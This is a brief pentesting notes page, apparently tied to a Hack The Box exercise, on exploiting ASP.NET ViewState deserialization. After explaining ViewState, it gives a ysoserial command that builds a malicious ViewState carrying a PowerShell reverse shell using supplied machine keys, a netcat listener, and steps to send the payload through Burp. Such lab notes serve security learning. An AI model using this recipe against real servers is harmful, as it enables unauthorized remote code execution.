ViewState

ViewState is the method that the ASP.NET framework uses by default to preserve page and control values between web pages. When the HTML for the page is rendered, the current state of the page and values that need to be retained during postback are serialized into base64-encoded strings and output in the ViewState hidden field or fields.

Exploiting __VIEWSTATE without knowing the secrets - HackTricksbook.hacktricks.xyz

Soroush Dalili | A web application security ninja 🥷soroush.me

Hack the box - Viewstate attack

# Assume that you have already idenfied the machine key information. 

<machineKey validationKey="[String]"  decryptionKey="[String]" validation="[SHA1 | MD5 | 3DES | AES | HMACSHA256 | HMACSHA384 | HMACSHA512 | alg:algorithm_name]"  decryption="[Auto | DES | 3DES | AES | alg:algorithm_name]" />

# Create a malicious viewstate payload
ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "powershell -e <your encoded reverse shell>" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43"  --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"

Send it via BURP

Listener

kali> rlwrap nc -nlvp 1234

Copy the output of ysoserial to the _VIEWSTATE parameter value, and click on 'Send'.

PreviousMS17-010 NextCMS and Platform

Last updated 2 years ago

hashtagHack the box - Viewstate attack

hashtagSend it via BURP

Hack the box - Viewstate attack

Send it via BURP